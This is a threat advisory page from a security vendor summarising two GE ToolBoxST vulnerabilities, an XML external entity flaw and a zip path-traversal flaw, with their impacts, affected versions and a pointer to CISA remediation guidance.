Rewterz Threat Advisory – CVE-2021-39031 – IBM WebSphere Application Server Vulnerability
January 26, 2022Rewterz Threat Update – BRATA Malware Wipes Devices after Stealing Data – Active IOCs
January 26, 2022Rewterz Threat Advisory – CVE-2021-39031 – IBM WebSphere Application Server Vulnerability
January 26, 2022Rewterz Threat Update – BRATA Malware Wipes Devices after Stealing Data – Active IOCs
January 26, 2022Severity
High
Analysis Summary
CVE-2021-44477
GE Gas Power ToolBoxST Version v04.07.05C suffers from an XML external entity (XXE) vulnerability using the DTD parameter entities technique that could result in disclosure and retrieval of arbitrary data on the affected node via an out-of-band (OOB) attack. The vulnerability is triggered when input passed to the XML parser is not sanitized while parsing the XML project/template file.
CVE-2018-16202
ToolBoxST prior to Version 7.8.0 uses a vulnerable version of the Ionic .NET Zip library that does not properly sanitize path names allowing files to be extracted to a location above their parent directory and back to the root directory. If an attacker compromises an HMI or creates their own SDI client, they can upload the device.zip file from a controller, patch it to contain a malicious file and path, and download it back to the controller. The next user to perform an upload could grab the malicious device.zip and extract it to their HMI, creating the potential for arbitrary write, overwrite, and execution.
Impact
- Data Exfiltration
- Code Execution
Affected Vendors
- GE
Affected Products
- ToolBoxST OS: All versions prior to 07.09.07C
Remediation
Refer to CISA Advisory for the patch, upgrade, or suggested workaround information.